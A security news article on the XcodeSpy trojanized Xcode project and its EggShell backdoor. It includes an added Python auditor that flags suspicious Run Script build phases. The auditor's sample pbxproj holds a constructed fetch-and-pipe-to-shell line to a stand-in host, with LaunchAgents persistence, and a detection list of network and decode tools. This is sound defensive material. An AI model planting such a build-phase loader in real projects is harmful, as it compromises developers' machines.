Cybersecurity researchers on Thursday disclosed a new attack in which threat actors use Xcode as an attack vector to compromise Apple platform developers, adding to a growing trend of targeting developers and researchers with malicious attacks.
Called "XcodeSpy," the trojanized Xcode project is a doctored version of a legitimate open source project available on GitHub called TabBarInteraction, which developers use to animate iOS tab bars based on user interaction.
"XcodeSpy is a malicious Xcode project that installs a custom variant of the EggShell backdoor on the developer's macOS computer along with a persistence mechanism," SentinelOne researchers said.
Xcode is Apple’s integrated development environment (IDE) for macOS, which is used to develop software for macOS, iOS, iPadOS, watchOS, and tvOS.
Earlier this year, Google's Threat Analysis Group disclosed a North Korean campaign aimed at security researchers and exploit developers, which involved sharing a Visual Studio project designed to load a malicious DLL on Windows systems.
The doctored Xcode project does something similar, only this time the attackers have singled out Apple developers.
Apart from the original project's code, XcodeSpy also includes an obfuscated Run Script build phase that is executed when the developer's build target is launched. The script then contacts an attacker-controlled server to retrieve a custom variant of the EggShell backdoor onto the development machine; the backdoor can record from the victim's microphone, camera, and keyboard.
"XcodeSpy takes advantage of a built-in feature of Apple's IDE that allows developers to run a custom shell script when launching an instance of their target application," the researchers said. "Although the technique is easily identifiable if viewed, new or inexperienced developers who are not aware of the Run Script feature are at particular risk as there is no indication in the console or debugger to indicate that the malicious script has executed."
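The Run Script build phase described above lives in the project's project.pbxproj file as a PBXShellScriptBuildPhase object whose shellScript value is an escaped string. The following is an added example (not code from the SentinelOne report or from the XcodeSpy project) of the check a developer or reviewer can run before building a third-party Xcode project: it parses every PBXShellScriptBuildPhase out of a pbxproj, unescapes the script, and flags textual indicators of a loader (network fetch, pipe-to-shell or eval, decode layers such as base64, and writes to persistence paths). The embedded pbxproj is constructed for the example and does not reproduce the actual XcodeSpy script; the indicator list and the `env-hidden-in-log` signal (Xcode's "Show environment variables in build log" unchecked) are heuristics chosen here, not findings from the report.

```python
"""Audit an Xcode project.pbxproj for Run Script build phases that look like loaders."""
import re

# One PBXShellScriptBuildPhase object: "<24-hex id> /* name */ = { isa = PBXShellScriptBuildPhase; ... };"
PHASE_RE = re.compile(
    r"(?P<id>[0-9A-Fa-f]{24})\s*(?:/\*\s*(?P<name>[^*]*?)\s*\*/)?\s*=\s*\{\s*"
    r"isa\s*=\s*PBXShellScriptBuildPhase;(?P<body>.*?)\n\s*\};",
    re.S,
)
# shellScript is a double-quoted pbxproj string using backslash escapes (\n, \", \\).
SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)";', re.S)
ESCAPES = {"n": "\n", "t": "\t", '"': '"', "\\": "\\"}

# Heuristic indicators (assumed for this example). Hits are leads to read the script, not verdicts.
INDICATORS = [
    ("remote-fetch", re.compile(r"\b(curl|wget|nscurl)\b|/dev/tcp/|\bnc\b")),
    ("pipe-to-shell", re.compile(r"\|\s*(ba|z)?sh\b|\beval\b|\bosascript\b")),
    ("decode-layer", re.compile(r"base64\s+(-[dD]|--decode)|openssl\s+enc\s+-d|xxd\s+-r|\bpython[23]?\s+-c\b")),
    ("persistence-path", re.compile(r"LaunchAgents|LaunchDaemons|\.zshrc|\.bash_profile|\.bashrc")),
]


def unescape_pbx(s):
    """Turn a pbxproj-escaped string back into the shell text Xcode will run."""
    return re.sub(r"\\(.)", lambda m: ESCAPES.get(m.group(1), m.group(1)), s)


def extract_run_scripts(pbxproj_text):
    """Return every Run Script phase as {id, name, script, show_env}."""
    phases = []
    for m in PHASE_RE.finditer(pbxproj_text):
        body = m.group("body")
        sm = SCRIPT_RE.search(body)
        env = re.search(r"showEnvVarsInLog\s*=\s*(\d);", body)
        phases.append({
            "id": m.group("id"),
            "name": (m.group("name") or "").strip(),
            "script": unescape_pbx(sm.group(1)) if sm else "",
            # Xcode only writes the key when the option is unchecked; absent means shown (1).
            "show_env": env.group(1) if env else "1",
        })
    return phases


def flag_script(script, show_env="1"):
    """List indicator tags that fire on one Run Script body."""
    tags = [tag for tag, rx in INDICATORS if rx.search(script)]
    if show_env == "0":
        tags.append("env-hidden-in-log")  # weak signal: keeps the build log quieter
    return tags


def audit_pbxproj(text):
    """(id, name, tags) for each Run Script phase; empty tags means nothing fired."""
    return [(p["id"], p["name"], flag_script(p["script"], p["show_env"]))
            for p in extract_run_scripts(text)]


# Constructed sample: one ordinary lint phase and one phase shaped like a fetch-and-run loader.
SAMPLE_PBXPROJ = r'''// !$*UTF8*$!
{
	objects = {
/* Begin PBXShellScriptBuildPhase section */
		1A2B3C4D5E6F708192A3B4C5 /* SwiftLint */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
		};
		D5E6F708192A3B4C5D6E7F80 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "echo \"aGVsbG8K\" | base64 -d >/dev/null; curl -fsSL https://example.invalid/stage | sh; mkdir -p ~/Library/LaunchAgents\n";
			showEnvVarsInLog = 0;
		};
/* End PBXShellScriptBuildPhase section */
	};
}
'''

if __name__ == "__main__":
    for phase_id, name, tags in audit_pbxproj(SAMPLE_PBXPROJ):
        print(f"{phase_id} {name or '(unnamed)'}: {', '.join(tags) or 'no indicators'}")
```

To run it against a real project, read `Foo.xcodeproj/project.pbxproj` into a string and pass it to `audit_pbxproj`; any phase with a non-empty tag list should be opened and read in full before the first build, since the script runs with the developer's privileges at build time regardless of what the app itself does.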
SentinelOne said it identified two variants of the EggShell payload, with the samples uploaded to VirusTotal from Japan on August 5 and October 13 last year. Additional clues point to one unnamed organization in the United States that is said to have been targeted in this campaign between July and October 2020, with other developers in Asia likely targeted as well.
Previously, adversaries have turned to compromised Xcode compilers (aka XcodeGhost) to inject malicious code into iOS apps built with the tainted Xcode without the developers' knowledge, and subsequently used the infected apps to collect information from devices after they were downloaded and installed from the App Store.
Then in August 2020, researchers from Trend Micro uncovered a similar threat that spread through modified Xcode projects, which, when built, were configured to install macOS malware called XCSSET to steal credentials, capture screenshots, exfiltrate sensitive data from messaging and note-taking apps, and even encrypt files for ransom.
Unlike XCSSET, XcodeSpy takes a more direct path, as the aim appears to be to hit the developers themselves, although the ultimate objective behind the operation and the identity of the group behind it remain unclear so far.
"Targeting software developers is the first step in a successful supply chain attack. One way to do so is to abuse the very development tools necessary to carry out this work," the researchers said.
"XcodeSpy may well be targeted at a particular developer or group of developers, but there are other potential scenarios with such high-value victims. Attackers could be trawling for interesting targets and collecting data for future campaigns, or they might be trying to collect AppleID credentials for use in other campaigns that use malware with valid Apple Developer code signatures."